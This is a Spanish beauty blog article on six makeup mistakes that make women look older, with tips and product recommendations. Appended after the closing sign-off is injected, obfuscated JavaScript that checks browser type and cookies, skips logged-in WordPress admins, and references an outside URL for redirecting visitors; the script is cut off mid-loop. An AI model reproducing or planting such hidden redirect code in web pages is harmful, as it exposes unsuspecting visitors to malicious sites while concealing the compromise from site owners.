Nunca os habéis preguntado, ¿cuál es la verdadera función del maquillaje? Exacto: realzar los rasgos faciales para dar mayor vitalidad al rostro. La vitalidad es símbolo de juventud, por eso si no queremos aparentar ser mayores os aconsejamos seguir leyendo este artículo con los 6 errores de maquillaje más comunes que nos hacen parecer mayores y cómo corregirlos de forma fácil y práctica. Contar con productos de calidad o con aquellos que incluyen tratamientos específicos es fundamental para nuestro propósito, pero tampoco lo es todo. Así que presten atención porque… ¡empezamos!

Vista lateral de la alegre joven maquillarse y mirar su reflejo en el espejo mientras está sentado en el tocador

Error 1: cuidado con la base de maquillaje muy clara u oscura

Que los excesos no son buenos ya lo dijo Aristóteles en su momento, nosotras solo lo rescatamos para contaros porqué una base demasiado clara u oscura es un error que suma años. Si es demasiado clara acabaremos con un efecto rostro plano muy artificial. Cuando nos saltamos el “menos es más”, los resultados son igual de envejecedores. Así que, amigas mías, princesas de cuentos infinitos, para elegir una base de maquillaje en condiciones debéis probarla primero sobre vuestra piel o preguntarnos la equivalencia con vuestro tono y marca habitual.

Si queréis que os recomendemos una base de maquillaje infalible, os aconsejamos Double Wear Stay-in-Place de ESTÉE LAUDER Spf10 que dura hasta 24 horas para evitar que el maquillaje se acartone al final del día, proteger de los rayos del sol y es, además, un tratamiento antienvejecimiento. Un solo producto para evitar 2 errores que también nos hace parecer mayores. Increíble, pero cierto.

Error 2: el colorete mal aplicado suma años 

El colorete puede ser un aliado o el peor de tus enemigos. Para no parecer unos cuantos años mayores utilizaremos la cantidad justa sobre las zonas de nuestro rostro en las que de forma natural nos ruborizamos. Si por el contrario, nuestra intención es marcar los pómulos lo aplicaremos cerca de la sien. Eso sí, nunca, nunca, nunca, abusaremos de los tonos marrones que siempre suman años. Aunque si nos gustan los colores oscuros atentas a la edición limitada Otoño 2019 ROUGE BLUSH de DIOR, si existe un tono más bonito, avisarnos que nos bajamos ahora mismo de la vida.

Error 3: cejas invisibles el error más viejuno

Cuando nos estamos maquillando no deberíamos olvidarnos de ninguna parte, sin embargo, prescindir de unos labios pintados puede estar justificado, pero olvidarnos de maquillar las cejas es un error que nos hará parecer mucho más mayores. Por eso, insistimos a voz de grito (aunque no podáis escucharnos) en que os hagáis con un lápiz de cejas tan versátil como Couture Brow Slim de Yves Saint Laurent y, de paso,  echéis un ojo a la cantidad de ideas que os dimos en este artículo sobre cejas tupidas, tendencias y los mejores trucos para llevarlas.

 Líneas de crema de tono de piel en la cara de mujer. Hermosa mujer retrato belleza piel sana y maquillaje perfecto. Tiro del estudio Aislado en blanco

Error 4: no pasarse con la sombra de ojos

Ante un evento social importante, muchas de vosotras insistís en que si no os maquillamos con sombras no parecerá que sea un día especial. Hoy, queremos aprovechar este artículo para deciros que, según vuestra edad, un exceso de sombras os restará luminosidad y acentuará las pequeñas arrugas de la zona de los ojos. Con esto no queremos decir que desterréis esta posibilidad de vuestros kits de maquillaje, sino que hagáis un uso responsable. Nuestro consejo es aplicar los tonos oscuros en la zona exterior del párpado y los claros en el lagrimal. Si preferimos un degradado, que sea siempre de más oscuro a más claro ¡nunca al revés! Por último, ya que no las vamos a utilizar mucho, os recomendamos no invertir una gran cantidad de dinero y haceros con las sombras de Essence Cosmetics a un increíble precio y gran cantidad de colores.

Error 5: labios muy oscuros

Tenemos asociado que unos labios oscuros son sinónimo de elegancia, fortaleza y personalidad, pero debemos asumir que esto no siempre es así. Con el paso de los años, un tono de labios demasiado oscuro tiende a endurecer las facciones y a hacer los labios más finos lo que repercute en la edad que aparentamos. Para rejuvenecer nuestro look, elegiremos tonos nude que nos ayuden a crear un efecto labios más gruesos y los labiales claros y glow como estos tonos rosa tan bonitos de la gama Rouge G Mat de Guerlain.

Error 6: no saber qué líneas del ojo maquillar

Un truco para restarnos años consiste en agrandar la mirada. Cuando maquillamos la línea inferior o línea del agua nuestros ojos parecen más pequeños y nosotras más mayores, por lo que gritemos juntas: ¡error! En su lugar, agrandaremos la mirada con un lápiz de ojos como Crayon Yeux Waterproof de Clarins aplicándolo sobre la línea superior o para crear un sutil eyeleiner muy difuminado. Por supuesto, la máscara de pestañas es clave, pero solo si la utilizamos en las pestañas de arriba y mejoramos la jugada con un rizador de toda la vida. Sí, señoritas, aquel aparato que tanto miedo nos daba de pequeñas.

Hermosa joven pestañas rizadas con rizador de pestañas cubren la boca con la mano sorprendida de vergüenza por error expresión de miedo asustado en silencio concepto secreto

Hasta aquí nuestra lista con los 6 errores de maquillaje más comunes que nos hacen parecer mayores. La juventud es un estado mental, por eso no queremos que ni la ropa, ni nuestro maquillaje nos sumen unos años que no van con nuestra forma de pensar y de vivir. Ahora os toca a vosotras contarnos qué os han parecido estos consejos o si conocéis otros mejores. ¡Hasta la próxima! var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone